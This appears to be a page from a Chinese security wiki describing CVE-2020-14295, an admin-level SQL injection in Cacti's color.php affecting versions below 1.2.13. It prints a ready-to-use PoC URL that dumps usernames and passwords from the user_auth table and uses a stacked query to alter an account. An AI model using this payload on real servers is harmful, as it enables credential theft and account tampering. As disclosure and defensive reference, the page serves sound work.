menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right Cacti SQL 注入漏洞(CVE-2020-14295).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Cacti SQL 注入漏洞(CVE-2020-14295).md
    562 B / 2021-05-21 09:14:38
        # Cacti SQL 注入漏洞(CVE-2020-14295)
    
    Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞,允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询,所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。
    
    影响版本:
    
    Cacti < 1.2.13
    
    详情可以参考:https://github.com/Cacti/cacti/issues/3622
    
    PoC:
    
    ```
    /cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-
    
    ```
    
    links
    file_download